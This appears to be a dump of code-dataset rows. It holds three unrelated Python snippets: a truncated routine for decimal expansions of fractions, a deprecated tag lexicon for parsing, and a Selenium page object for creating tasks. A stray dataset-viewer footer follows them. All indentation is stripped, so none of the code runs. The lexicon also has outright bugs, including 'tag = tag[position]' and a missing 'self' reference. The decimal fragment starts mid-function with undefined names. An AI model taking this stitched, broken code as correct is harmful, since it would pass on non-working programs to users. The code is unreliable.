l=[]
L_1=[]
L_2=[]
new_numerator=numerator_gcd
L.append(int(new_numerator//denominator_gcd))
while True:
numerator_temp = int(new_numerator% denominator_gcd)*10
p=int(new_numerator % denominator_gcd)
q=int(new_numerator // denominator_gcd)
L_1.append(p)
if int(numerator_temp)==0:
print(int(new_numerator% denominator_gcd))
has_finite_expansion = True
decimal=(numerator/denominator)-(numerator // denominator)
decimal_str=str(decimal)[2::]
integral_part= int(numerator // denominator)
sigma= decimal_str
break
else:
if len(set(L_1))==len(L_1):
L.append(int(numerator_temp//denominator_gcd))
new_numerator = numerator_temp
else:
L_2.append(p)
if len(set(L_2))==len(L_2):
l.append(int(numerator_temp // denominator_gcd))
new_numerator = numerator_temp
else:
sigema_temp=''.join(str(L))
sigema_temp=sigema_temp.replace(",","")
sigma=sigema_temp.replace(" ","")[len(integral_part)+1:len(L)-len(l)+1]
tau_temp=''.join(str(l))
tau_temp=tau_temp.replace(",","")
tau=tau_temp.replace(" ","")[1:len(l)+1]
break
if has_finite_expansion:
print(f'\n{numerator} / {denominator} has a finite expansion')
else:
print(f'\n{numerator} / {denominator} has no finite expansion')
if not tau:
if not sigma:
print(f'{numerator} / {denominator} = {integral_part}')
else:
print(f'{numerator} / {denominator} = {integral_part}.{sigma}')
else:
print(f'{numerator} / {denominator} = {integral_part}.{sigma}({tau})*')
|
15,198 | 80b8d696ddc5f3e19eb3525937228eacba5a59c6 | from collections import defaultdict
"""
DEPRECATED. Using NLTK libraries now.
See pseudo_parser, stmt_parser and stmt_classifier.
"""
class Lexicon:
'''Simple default implementation of a lexicon, which scores word,
tag pairs with a smoothed estimate of P(tag|word)/P(tag).'''
# Builds a lexicon from the observed tags in a list of training trees.
def __init__(self, trainTrees):
self.wordToTagCounters = defaultdict(float)
self.totalTokens = 0.0
self.totalWordTypes = 0.0
self.tagCounter = defaultdict(float)
self.wordCounter = defaultdict(float)
self.typeTagCounter = defaultdict(float)
for trainTree in trainTrees:
words = trainTree.getYield()
tags = trainTree.getPreTerminalYield()
for position in xrange(len(words)):
word = words[position]
tag = tag[position]
self.tallyTagging(word, tag)
def tallyTagging(self, word, tag):
if not self.isKnown(word):
self.totalWordTypes += 1
self.typeTagCounter[tag] += 1
self.totalTokens += 1
self.tagCounter[tag] += 1
self.wordCounter[word] += 1
self.wordToTagCounters[(word, tag)] += 1
def isKnown(self, word):
return word in self.wordCounter.keys()
def getAllTags(self):
return tagCounter.keys()
# Returns a smoothed estimate of P(word|tag)
def scoreTagging(self, word, tag):
p_tag = self.tagCounter[tag] / self.totalTokens
c_word = self.wordCounter[word]
c_tag_and_word = self.wordToTagCounters[(word, tag)]
if c_word < 10: # rare or unknown
c_word += 1
c_tag_and_word += self.typeTagCounter[tag] / self.totalWordTypes
p_word = (1.0 + c_word) / (self.totalTokens + self.totalWordTypes)
p_tag_given_word = c_tag_and_word / c_word
return p_tag_given_word / p_tag * p_word
|
15,199 | a380b9726afdb86864a3b1b8afe96086928ce7f0 | import time
from selenium.webdriver.common.by import By
from base_page_object import BasePage
from nose.tools import assert_equal, assert_true
class CreateTaskPage(BasePage):
locator_dictionary = {
"create_task_header": (By.XPATH, "//span[.='Set a task']"),
"task_name_field": (By.XPATH, "//input[@name='description']"),
"low_field": (By.XPATH, "//input[@value='3']"),
"medium_field": (By.XPATH, "//input[@value='2']"),
"high_field": (By.XPATH, "//input[@value='1']"),
"select_done": (By.XPATH, "//div[@class='ant-modal-body']//button[@role='switch']"),
"save_button": (By.XPATH, "//button[contains(.,'Save')]")
}
def __init__(self, context):
BasePage.__init__(
self,
context.browser)
def create_task(self, value):
time.sleep(5)
self.task_name_field.send_keys("Task_%s" % value)
if value == "low":
self.low_field.click()
elif value == "medium":
self.medium_field.click()
elif value == "high":
self.high_field.click()
self.select_done.click()
self.save_button.click()
time.sleep(5) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.